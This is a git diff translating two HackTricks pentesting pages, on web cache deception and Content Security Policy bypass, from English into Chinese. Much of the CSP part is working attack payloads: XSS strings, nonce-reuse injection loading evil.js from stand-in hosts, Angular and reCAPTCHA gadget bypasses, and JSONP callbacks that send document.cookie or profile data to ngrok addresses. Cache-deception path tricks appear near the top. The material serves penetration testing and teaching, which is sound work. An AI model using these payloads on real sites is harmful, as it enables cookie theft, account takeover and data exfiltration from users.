-> The goal of this attack is to **make the cache server think that a static resource is being loaded** so it caches it while the cache server stores as cache key part of the path but the web server responds resolving another path. The web server will resolve the real path which will be loading a dynamic page (which might store sensitive information about the user, a malicious payload like XSS or redirecting to lo load a JS file from the attackers website for example).
+> 此攻击的目标是 **让缓存服务器认为正在加载静态资源**，因此它会缓存该资源，而缓存服务器将路径的一部分存储为缓存键，但Web服务器响应解析另一个路径。Web服务器将解析实际路径，这将加载一个动态页面（可能存储有关用户的敏感信息、恶意负载如XSS，或重定向以从攻击者网站加载JS文件等）。
 
 ## Delimiters
 
-**URL delimiters** vary by framework and server, impacting how requests are routed and responses are handled. Some common origin delimiters are:
+**URL分隔符**因框架和服务器而异，影响请求的路由和响应的处理。一些常见的源分隔符包括：
 
-- **Semicolon**: Used in Spring for matrix variables (e.g. `/hello;var=a/world;var1=b;var2=c` → `/hello/world`).
-- **Dot**: Specifies response format in Ruby on Rails (e.g. `/MyAccount.css` → `/MyAccount`)
-- **Null Byte**: Truncates paths in OpenLiteSpeed (e.g. `/MyAccount%00aaa` → `/MyAccount`).
-- **Newline Byte**: Separates URL components in Nginx (e.g. `/users/MyAccount%0aaaa` → `/account/MyAccount`).
+- **分号**：在Spring中用于矩阵变量（例如 `/hello;var=a/world;var1=b;var2=c` → `/hello/world`）。
+- **点**：在Ruby on Rails中指定响应格式（例如 `/MyAccount.css` → `/MyAccount`）。
+- **空字节**：在OpenLiteSpeed中截断路径（例如 `/MyAccount%00aaa` → `/MyAccount`）。
+- **换行字节**：在Nginx中分隔URL组件（例如 `/users/MyAccount%0aaaa` → `/account/MyAccount`）。
 
-Other specific delimiters might be found following this process:
+在此过程中可能会发现其他特定的分隔符：
 
-- **Step 1**: Identify non-cacheable requests and use them to monitor how URLs with potential delimiters are handled.
-- **Step 2**: Append random suffixes to paths and compare the server's response to determine if a character functions as a delimiter.
-- **Step 3**: Introduce potential delimiters before the random suffix to see if the response changes, indicating delimiter usage.
+- **步骤1**：识别不可缓存的请求，并使用它们监控潜在分隔符的URL处理方式。
+- **步骤2**：将随机后缀附加到路径，并比较服务器的响应以确定字符是否作为分隔符。
+- **步骤3**：在随机后缀之前引入潜在分隔符，以查看响应是否发生变化，指示分隔符的使用。
 
 ## Normalization & Encodings
 
-- **Purpose**: URL parsers in both cache and origin servers normalize URLs to extract paths for endpoint mapping and cache keys.
-- **Process**: Identifies path delimiters, extracts and normalizes the path by decoding characters and removing dot-segments.
+- **目的**：缓存和源服务器中的URL解析器规范化URL，以提取路径以进行端点映射和缓存键。
+- **过程**：识别路径分隔符，通过解码字符和删除点段提取并规范化路径。
 
 ### **Encodings**
 
-Different HTTP servers and proxies like Nginx, Node, and CloudFront decode delimiters differently, leading to inconsistencies across CDNs and origin servers that could be exploited. For example, if the web server perform this transformation `/myAccount%3Fparam` → `/myAccount?param` but the cache server keeps as key the path `/myAccount%3Fparam`, there is an inconsistency.&#x20;
+不同的HTTP服务器和代理（如Nginx、Node和CloudFront）以不同方式解码分隔符，导致CDN和源服务器之间的不一致，这可能被利用。例如，如果Web服务器执行此转换 `/myAccount%3Fparam` → `/myAccount?param`，但缓存服务器将路径 `/myAccount%3Fparam` 作为键保留，则存在不一致。&#x20;
 
-A way to check for these inconsistencies is to send requests URL encoding different chars after loading the path without any encoding and check if the encoded path response came from the cached response.
+检查这些不一致的一种方法是发送请求，URL编码不同的字符，在加载路径而不进行任何编码后，检查编码路径的响应是否来自缓存响应。
 
 ### Dot segment
 
-The path normalization where dots are involved is also very interesting for cache poisoning attacks. For example, `/static/../home/index` or `/aaa..\home/index`, some cache servers will cache these paths with themselves ad the keys while other might resolve the path and use `/home/index` as the cache key.\
-Just like before, sending these kind of requests and checking if the response was gathered from the cache helps to identify if the response to `/home/index` is the response sent when those paths are requested.
+涉及点的路径规范化对于缓存中毒攻击也非常有趣。例如，`/static/../home/index` 或 `/aaa..\home/index`，一些缓存服务器将这些路径缓存为它们自己作为键，而其他服务器可能解析路径并使用 `/home/index` 作为缓存键。\
+就像之前一样，发送这些请求并检查响应是否来自缓存有助于识别对 `/home/index` 的响应是否是请求这些路径时发送的响应。
 
 ## Static Resources
 
-Several cache servers will always cache a response if it's identified as static. This might be because:
+如果响应被识别为静态，多个缓存服务器将始终缓存该响应。这可能是因为：
 
-- **The extension**: Cloudflare will always cache files with the following extensions: 7z, csv, gif, midi, png, tif, zip, avi, doc, gz, mkv, ppt, tiff, zst, avif, docx, ico, mp3, pptx, ttf, apk, dmg, iso, mp4, ps, webm, bin, ejs, jar, ogg, rar, webp, bmp, eot, jpg, otf, svg, woff, bz2, eps, jpeg, pdf, svgz, woff2, class, exe, js, pict, swf, xls, css, flac, mid, pls, tar, xlsx
-  - It's possible to force a cache storing a dynamic response by using a delimiter and a static extension like a request to `/home$image.png` will cache `/home$image.png` and the origin server will respond with `/home`
-- **Well-known static directories**: The following directories contains static files and therefore their response should be cached: /static, /assets, /wp-content, /media, /templates, /public, /shared
-  - It's possible to force a cache storing a dynamic response by using a delimiter, a static directory and dots like: `/home/..%2fstatic/something` will cache `/static/something` and the response will be`/home`
-  - **Static dirs + dots**: A request to `/static/..%2Fhome` or to `/static/..%5Chome` might be cached as is but the response might be `/home`
-- **Static files:** Some specific files are always cached like `/robots.txt`, `/favicon.ico`, and `/index.html`. Which can be abused like `/home/..%2Frobots.txt` where the cace might store `/robots.txt` and the origin server respond to `/home`.
+- **扩展名**：Cloudflare将始终缓存以下扩展名的文件：7z, csv, gif, midi, png, tif, zip, avi, doc, gz, mkv, ppt, tiff, zst, avif, docx, ico, mp3, pptx, ttf, apk, dmg, iso, mp4, ps, webm, bin, ejs, jar, ogg, rar, webp, bmp, eot, jpg, otf, svg, woff, bz2, eps, jpeg, pdf, svgz, woff2, class, exe, js, pict, swf, xls, css, flac, mid, pls, tar, xlsx
+- 可以通过使用分隔符和静态扩展强制缓存存储动态响应，例如请求 `/home$image.png` 将缓存 `/home$image.png`，而源服务器将响应 `/home`
+- **知名静态目录**：以下目录包含静态文件，因此其响应应被缓存：/static, /assets, /wp-content, /media, /templates, /public, /shared
+- 可以通过使用分隔符、静态目录和点强制缓存存储动态响应，例如：`/home/..%2fstatic/something` 将缓存 `/static/something`，而响应将是 `/home`
+- **静态目录 + 点**：请求 `/static/..%2Fhome` 或 `/static/..%5Chome` 可能会按原样缓存，但响应可能是 `/home`
+- **静态文件**：一些特定文件始终被缓存，如 `/robots.txt`、`/favicon.ico` 和 `/index.html`。这可以被滥用，例如 `/home/..%2Frobots.txt`，其中缓存可能存储 `/robots.txt`，而源服务器响应 `/home`。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md
index 118050c61..da6ee17b4 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -1,51 +1,46 @@
-# Content Security Policy (CSP) Bypass
+# 内容安全策略 (CSP) 绕过
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客洞察**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+及时了解最新的漏洞赏金计划和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作吧！
 
-## What is CSP
+## 什么是 CSP
 
-Content Security Policy (CSP) is recognized as a browser technology, primarily aimed at **shielding against attacks such as cross-site scripting (XSS)**. It functions by defining and detailing paths and sources from which resources can be securely loaded by the browser. These resources encompass a range of elements such as images, frames, and JavaScript. For instance, a policy might permit the loading and execution of resources from the same domain (self), including inline resources and the execution of string code through functions like `eval`, `setTimeout`, or `setInterval`.
+内容安全策略 (CSP) 被认为是一种浏览器技术，主要旨在 **防御诸如跨站脚本 (XSS) 的攻击**。它通过定义和详细说明资源可以安全加载的路径和来源来运作。这些资源包括图像、框架和 JavaScript 等多种元素。例如，策略可能允许从同一域 (self) 加载和执行资源，包括内联资源以及通过 `eval`、`setTimeout` 或 `setInterval` 等函数执行字符串代码。
 
-Implementation of CSP is conducted through **response headers** or by incorporating **meta elements into the HTML page**. Following this policy, browsers proactively enforce these stipulations and immediately block any detected violations.
-
-- Implemented via response header:
+CSP 的实施通过 **响应头** 或通过将 **meta 元素嵌入 HTML 页面** 来进行。遵循此政策后，浏览器会主动执行这些规定，并立即阻止任何检测到的违规行为。
 
+- 通过响应头实施：
 ```
 Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
 ```
-
-- Implemented via meta tag:
-
+- 通过 meta 标签实现：
 ```xml
 <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
 ```
-
 ### Headers
 
-CSP can be enforced or monitored using these headers:
+CSP 可以通过以下头部进行强制执行或监控：
 
-- `Content-Security-Policy`: Enforces the CSP; the browser blocks any violations.
-- `Content-Security-Policy-Report-Only`: Used for monitoring; reports violations without blocking them. Ideal for testing in pre-production environments.
+- `Content-Security-Policy`: 强制执行 CSP；浏览器阻止任何违规行为。
+- `Content-Security-Policy-Report-Only`: 用于监控；报告违规行为而不阻止它们。非常适合在预生产环境中进行测试。
 
 ### Defining Resources
 
-CSP restricts the origins for loading both active and passive content, controlling aspects like inline JavaScript execution and the use of `eval()`. An example policy is:
-
+CSP 限制加载主动和被动内容的来源，控制诸如内联 JavaScript 执行和使用 `eval()` 等方面。一个示例策略是：
 ```bash
 default-src 'none';
 img-src 'self';
@@ -57,82 +52,77 @@ frame-src 'self' https://ic.paypal.com https://paypal.com;
 media-src https://videos.cdn.mozilla.net;
 object-src 'none';
 ```
+### 指令
 
-### Directives
+- **script-src**: 允许特定来源的 JavaScript，包括 URL、内联脚本和由事件处理程序或 XSLT 样式表触发的脚本。
+- **default-src**: 设置在缺少特定获取指令时获取资源的默认策略。
+- **child-src**: 指定允许的 web worker 和嵌入框架内容的资源。
+- **connect-src**: 限制可以使用 fetch、WebSocket、XMLHttpRequest 等接口加载的 URL。
+- **frame-src**: 限制框架的 URL。
+- **frame-ancestors**: 指定可以嵌入当前页面的来源，适用于 `<frame>`、`<iframe>`、`<object>`、`<embed>` 和 `<applet>` 等元素。
+- **img-src**: 定义允许的图像来源。
+- **font-src**: 指定使用 `@font-face` 加载的字体的有效来源。
+- **manifest-src**: 定义应用程序清单文件的允许来源。
+- **media-src**: 定义加载媒体对象的允许来源。
+- **object-src**: 定义 `<object>`、`<embed>` 和 `<applet>` 元素的允许来源。
+- **base-uri**: 指定使用 `<base>` 元素加载的允许 URL。
+- **form-action**: 列出表单提交的有效端点。
+- **plugin-types**: 限制页面可以调用的 MIME 类型。
+- **upgrade-insecure-requests**: 指示浏览器将 HTTP URL 重写为 HTTPS。
+- **sandbox**: 应用类似于 `<iframe>` 的 sandbox 属性的限制。
+- **report-to**: 指定如果违反政策将发送报告的组。
+- **worker-src**: 指定 Worker、SharedWorker 或 ServiceWorker 脚本的有效来源。
+- **prefetch-src**: 指定将被获取或预获取的资源的有效来源。
+- **navigate-to**: 限制文档可以通过任何方式导航到的 URL（a、form、window.location、window.open 等）。
 
-- **script-src**: Allows specific sources for JavaScript, including URLs, inline scripts, and scripts triggered by event handlers or XSLT stylesheets.
-- **default-src**: Sets a default policy for fetching resources when specific fetch directives are absent.
-- **child-src**: Specifies allowed resources for web workers and embedded frame contents.
-- **connect-src**: Restricts URLs which can be loaded using interfaces like fetch, WebSocket, XMLHttpRequest.
-- **frame-src**: Restricts URLs for frames.
-- **frame-ancestors**: Specifies which sources can embed the current page, applicable to elements like `<frame>`, `<iframe>`, `<object>`, `<embed>`, and `<applet>`.
-- **img-src**: Defines allowed sources for images.
-- **font-src**: Specifies valid sources for fonts loaded using `@font-face`.
-- **manifest-src**: Defines allowed sources of application manifest files.
-- **media-src**: Defines allowed sources for loading media objects.
-- **object-src**: Defines allowed sources for `<object>`, `<embed>`, and `<applet>` elements.
-- **base-uri**: Specifies allowed URLs for loading using `<base>` elements.
-- **form-action**: Lists valid endpoints for form submissions.
-- **plugin-types**: Restricts mime types that a page may invoke.
-- **upgrade-insecure-requests**: Instructs browsers to rewrite HTTP URLs to HTTPS.
-- **sandbox**: Applies restrictions similar to the sandbox attribute of an `<iframe>`.
-- **report-to**: Specifies a group to which a report will be sent if the policy is violated.
-- **worker-src**: Specifies valid sources for Worker, SharedWorker, or ServiceWorker scripts.
-- **prefetch-src**: Specifies valid sources for resources that will be fetched or prefetched.
-- **navigate-to**: Restricts the URLs to which a document can navigate by any means (a, form, window.location, window.open, etc.)
+### 来源
 
-### Sources
-
-- `*`: Allows all URLs except those with `data:`, `blob:`, `filesystem:` schemes.
-- `'self'`: Allows loading from the same domain.
-- `'data'`: Allows resources to be loaded via the data scheme (e.g., Base64 encoded images).
-- `'none'`: Blocks loading from any source.
-- `'unsafe-eval'`: Allows the use of `eval()` and similar methods, not recommended for security reasons.
-- `'unsafe-hashes'`: Enables specific inline event handlers.
-- `'unsafe-inline'`: Allows the use of inline resources like inline `<script>` or `<style>`, not recommended for security reasons.
-- `'nonce'`: A whitelist for specific inline scripts using a cryptographic nonce (number used once).
-  - If you have JS limited execution it's possible to get a used nonce inside the page with `doc.defaultView.top.document.querySelector("[nonce]")` and then reuse it to load a malicious script (if strict-dynamic is used, any allowed source can load new sources so this isn't needed), like in:
+- `*`: 允许所有 URL，除了具有 `data:`、`blob:`、`filesystem:` 方案的 URL。
+- `'self'`: 允许从同一域加载。
+- `'data'`: 允许通过数据方案加载资源（例如，Base64 编码的图像）。
+- `'none'`: 阻止从任何来源加载。
+- `'unsafe-eval'`: 允许使用 `eval()` 和类似方法，出于安全原因不推荐使用。
+- `'unsafe-hashes'`: 启用特定的内联事件处理程序。
+- `'unsafe-inline'`: 允许使用内联资源，如内联 `<script>` 或 `<style>`，出于安全原因不推荐使用。
+- `'nonce'`: 使用加密 nonce（一次性使用的数字）对特定内联脚本的白名单。
+- 如果您有 JS 限制执行，可以使用 `doc.defaultView.top.document.querySelector("[nonce]")` 获取页面内使用的 nonce，然后重用它加载恶意脚本（如果使用 strict-dynamic，任何允许的来源都可以加载新来源，因此不需要这样做），如：
 
 <details>
 
-<summary>Load script reusing nonce</summary>
-
+<summary>重用 nonce 加载脚本</summary>
 ```html
 <!-- From https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/ -->
 <img
-  src="x"
-  ng-on-error='
+src="x"
+ng-on-error='
 doc=$event.target.ownerDocument;
 a=doc.defaultView.top.document.querySelector("[nonce]");
 b=doc.createElement("script");
 b.src="//example.com/evil.js";
 b.nonce=a.nonce; doc.body.appendChild(b)' />
 ```
-
 </details>
 
-- `'sha256-<hash>'`: Whitelists scripts with a specific sha256 hash.
-- `'strict-dynamic'`: Allows loading scripts from any source if it has been whitelisted by a nonce or hash.
-- `'host'`: Specifies a specific host, like `example.com`.
-- `https:`: Restricts URLs to those that use HTTPS.
-- `blob:`: Allows resources to be loaded from Blob URLs (e.g., Blob URLs created via JavaScript).
-- `filesystem:`: Allows resources to be loaded from the filesystem.
-- `'report-sample'`: Includes a sample of the violating code in the violation report (useful for debugging).
-- `'strict-origin'`: Similar to 'self' but ensures the protocol security level of the sources matches the document (only secure origins can load resources from secure origins).
-- `'strict-origin-when-cross-origin'`: Sends full URLs when making same-origin requests but only sends the origin when the request is cross-origin.
-- `'unsafe-allow-redirects'`: Allows resources to be loaded that will immediately redirect to another resource. Not recommended as it weakens security.
+- `'sha256-<hash>'`：允许特定 sha256 哈希的脚本。
+- `'strict-dynamic'`：如果通过 nonce 或哈希被列入白名单，则允许从任何来源加载脚本。
+- `'host'`：指定特定主机，例如 `example.com`。
+- `https:`：限制 URL 仅使用 HTTPS。
+- `blob:`：允许从 Blob URL 加载资源（例如，通过 JavaScript 创建的 Blob URL）。
+- `filesystem:`：允许从文件系统加载资源。
+- `'report-sample'`：在违规报告中包含违规代码的示例（对调试有用）。
+- `'strict-origin'`：类似于 'self'，但确保源的协议安全级别与文档匹配（只有安全源可以从安全源加载资源）。
+- `'strict-origin-when-cross-origin'`：在进行同源请求时发送完整 URL，但在跨源请求时仅发送源。
+- `'unsafe-allow-redirects'`：允许加载会立即重定向到另一个资源的资源。不推荐使用，因为这会削弱安全性。
 
-## Unsafe CSP Rules
+## 不安全的 CSP 规则
 
 ### 'unsafe-inline'
-
 ```yaml
 Content-Security-Policy: script-src https://google.com 'unsafe-inline';
 ```
+有效的有效载荷: `"/><script>alert(1);</script>`
 
-Working payload: `"/><script>alert(1);</script>`
-
-#### self + 'unsafe-inline' via Iframes
+#### 通过 Iframes 的 self + 'unsafe-inline'
 
 {{#ref}}
 csp-bypass-self-+-unsafe-inline-with-iframes.md
@@ -141,86 +131,67 @@ csp-bypass-self-+-unsafe-inline-with-iframes.md
 ### 'unsafe-eval'
 
 > [!CAUTION]
-> This is not working, for more info [**check this**](https://github.com/HackTricks-wiki/hacktricks/issues/653).
-
+> 这不起作用，更多信息请 [**查看此处**](https://github.com/HackTricks-wiki/hacktricks/issues/653)。
 ```yaml
 Content-Security-Policy: script-src https://google.com 'unsafe-eval';
 ```
-
-Working payload:
-
+有效载荷：
 ```html
 <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
 ```
-
 ### strict-dynamic
 
-If you can somehow make an **allowed JS code created a new script tag** in the DOM with your JS code, because an allowed script is creating it, the **new script tag will be allowed to be executed**.
+如果你能以某种方式使一个**允许的 JS 代码创建一个新的脚本标签**在 DOM 中，并且是由允许的脚本创建的，那么**新的脚本标签将被允许执行**。
 
 ### Wildcard (\*)
-
 ```yaml
 Content-Security-Policy: script-src 'self' https://google.com https: data *;
 ```
-
-Working payload:
-
+有效载荷：
 ```markup
 "/>'><script src=https://attacker-website.com/evil.js></script>
 "/>'><script src=data:text/javascript,alert(1337)></script>
 ```
+### 缺少 object-src 和 default-src
 
-### Lack of object-src and default-src
-
-> [!CAUTION] > **It looks like this is not longer working**
-
+> [!CAUTION] > **看起来这不再有效**
 ```yaml
 Content-Security-Policy: script-src 'self' ;
 ```
-
-Working payloads:
-
+有效的有效载荷：
 ```markup
 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
 ">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
 <param name="AllowScriptAccess" value="always"></object>
 ```
-
-### File Upload + 'self'
-
+### 文件上传 + 'self'
 ```yaml
 Content-Security-Policy: script-src 'self';  object-src 'none' ;
 ```
+如果您可以上传一个 JS 文件，您可以绕过这个 CSP：
 
-If you can upload a JS file you can bypass this CSP:
-
-Working payload:
-
+工作负载：
 ```markup
 "/>'><script src="/uploads/picture.png.js"></script>
 ```
+然而，服务器**正在验证上传的文件**，并且只允许您**上传特定类型的文件**。
 
-However, it's highly probable that the server is **validating the uploaded file** and will only allow you to **upload determined type of files**.
+此外，即使您能够使用服务器接受的扩展名（例如：_script.png_）在文件中上传**JS代码**，这也不够，因为一些服务器如apache服务器**根据扩展名选择文件的MIME类型**，而像Chrome这样的浏览器将**拒绝执行Javascript**代码在应该是图像的内容中。“希望”有错误。例如，从一个CTF中我了解到**Apache不知道**_**.wave**_扩展名，因此它不会以**MIME类型如audio/***提供它。
 
-Moreover, even if you could upload a **JS code inside** a file using an extension accepted by the server (like: _script.png_) this won't be enough because some servers like apache server **select MIME type of the file based on the extension** and browsers like Chrome will **reject to execute Javascript** code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that **Apache doesn't know** the _**.wave**_ extension, therefore it doesn't serve it with a **MIME type like audio/\***.
-
-From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)).
+从这里开始，如果您发现XSS和文件上传，并且您设法找到一个**被误解的扩展名**，您可以尝试上传一个具有该扩展名和脚本内容的文件。或者，如果服务器正在检查上传文件的正确格式，可以创建一个多重格式文件（[一些多重格式示例在这里](https://github.com/Polydet/polyglot-database)）。
 
 ### Form-action
 
-If not possible to inject JS, you could still try to exfiltrate for example credentials **injecting a form action** (and maybe expecting password managers to auto-fill passwords). You can find an [**example in this report**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp). Also, notice that `default-src` does not cover form actions.
+如果无法注入JS，您仍然可以尝试通过**注入表单操作**来提取例如凭据（并可能期望密码管理器自动填充密码）。您可以在[**此报告中找到一个示例**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。此外，请注意`default-src`不涵盖表单操作。
 
-### Third Party Endpoints + ('unsafe-eval')
+### 第三方端点 + ('unsafe-eval')
 
 > [!WARNING]
-> For some of the following payload **`unsafe-eval` is not even needed**.
-
+> 对于以下某些有效负载**`unsafe-eval`甚至不需要**。
 ```yaml
 Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
 ```
-
-Load a vulnerable version of angular and execute arbitrary JS:
-
+加载一个易受攻击的 Angular 版本并执行任意 JS：
 ```xml
 <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
 <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
@@ -236,66 +207,58 @@ Load a vulnerable version of angular and execute arbitrary JS:
 With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
 <script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
 <iframe/ng-app/ng-csp/srcdoc="
-  <script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
-  </script>
-  <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
+<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
+</script>
+<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
 >
 ```
-
-#### Payloads using Angular + a library with functions that return the `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
+#### 使用 Angular + 一个返回 `window` 对象的函数库的有效载荷 ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
 
 > [!NOTE]
-> The post shows that you could **load** all **libraries** from `cdn.cloudflare.com` (or any other allowed JS libraries repo), execute all added functions from each library, and check **which functions from which libraries return the `window` object**.
-
+> 该帖子显示您可以 **加载** 来自 `cdn.cloudflare.com`（或任何其他允许的 JS 库库）的所有 **库**，执行每个库中添加的所有函数，并检查 **哪些库中的哪些函数返回 `window` 对象**。
 ```markup
 <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
 <div ng-app ng-csp>
- {{$on.curry.call().alert(1)}}
- {{[].empty.call().alert([].empty.call().document.domain)}}
- {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
+{{$on.curry.call().alert(1)}}
+{{[].empty.call().alert([].empty.call().document.domain)}}
+{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
 </div>
 
 
 <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
 <div ng-app ng-csp>
-  {{$on.curry.call().alert('xss')}}
+{{$on.curry.call().alert('xss')}}
 </div>
 
 
 <script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
 <div ng-app ng-csp>
-  {{[].erase.call().alert('xss')}}
+{{[].erase.call().alert('xss')}}
 </div>
 ```
-
-Angular XSS from a class name:
-
+从类名进行 Angular XSS：
 ```html
 <div ng-app>
-  <strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
+<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
 </div>
 ```
+#### 滥用 Google reCAPTCHA JS 代码
 
-#### Abusing google recaptcha JS code
-
-According to [**this CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves) you can abuse [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) inside a CSP to execute arbitrary JS code bypassing the CSP:
-
+根据 [**这篇 CTF 文章**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves)，您可以在 CSP 内部滥用 [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) 来执行任意 JS 代码，从而绕过 CSP：
 ```html
 <div
-  ng-controller="CarouselController as c"
-  ng-init="c.init()"
+ng-controller="CarouselController as c"
+ng-init="c.init()"
 >
 &#91[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]]
 <div carousel><div slides></div></div>
 
 <script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
 ```
-
-More [**payloads from this writeup**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
-
+更多[**来自此文档的有效载荷**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
 ```html
 <script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
 
@@ -304,35 +267,29 @@ More [**payloads from this writeup**](https://joaxcar.com/blog/2024/02/19/csp-by
 
 <!-- Reuse nonce -->
 <img
-  src="x"
-  ng-on-error='
-	doc=$event.target.ownerDocument;
-	a=doc.defaultView.top.document.querySelector("[nonce]");
-	b=doc.createElement("script");
-	b.src="//example.com/evil.js";
-	b.nonce=a.nonce; doc.body.appendChild(b)' />
+src="x"
+ng-on-error='
+doc=$event.target.ownerDocument;
+a=doc.defaultView.top.document.querySelector("[nonce]");
+b=doc.createElement("script");
+b.src="//example.com/evil.js";
+b.nonce=a.nonce; doc.body.appendChild(b)' />
 ```
+#### 利用 www.google.com 进行开放重定向
 
-#### Abusing www.google.com for open redirect
-
-The following URL redirects to example.com (from [here](https://www.landh.tech/blog/20240304-google-hack-50000/)):
-
+以下 URL 重定向到 example.com (来自 [here](https://www.landh.tech/blog/20240304-google-hack-50000/)):
 ```
 https://www.google.com/amp/s/example.com/
 ```
+滥用 \*.google.com/script.google.com
 
-Abusing \*.google.com/script.google.com
-
-It's possible to abuse Google Apps Script to receive information in a page inside script.google.com. Like it's [done in this report](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/).
-
-### Third Party Endpoints + JSONP
+可以滥用 Google Apps Script 在 script.google.com 内的页面接收信息。就像在 [这份报告](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/) 中所做的那样。
 
+### 第三方端点 + JSONP
 ```http
 Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
 ```
-
-Scenarios like this where `script-src` is set to `self` and a particular domain which is whitelisted can be bypassed using JSONP. JSONP endpoints allow insecure callback methods which allow an attacker to perform XSS, working payload:
-
+像这样的场景，其中 `script-src` 设置为 `self` 和一个特定的白名单域，可以通过 JSONP 绕过。JSONP 端点允许不安全的回调方法，这使攻击者能够执行 XSS，工作有效载荷：
 ```markup
 "><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
 "><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
@@ -342,124 +299,108 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
 https://www.youtube.com/oembed?callback=alert;
 <script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
 ```
+[**JSONBee**](https://github.com/zigoo0/JSONBee) **包含可用于不同网站的CSP绕过的现成JSONP端点。**
 
-[**JSONBee**](https://github.com/zigoo0/JSONBee) **contains ready to use JSONP endpoints to CSP bypass of different websites.**
+如果**受信任的端点包含开放重定向**，则会发生相同的漏洞，因为如果初始端点是受信任的，则重定向也是受信任的。
 
-The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
+### 第三方滥用
 
-### Third Party Abuses
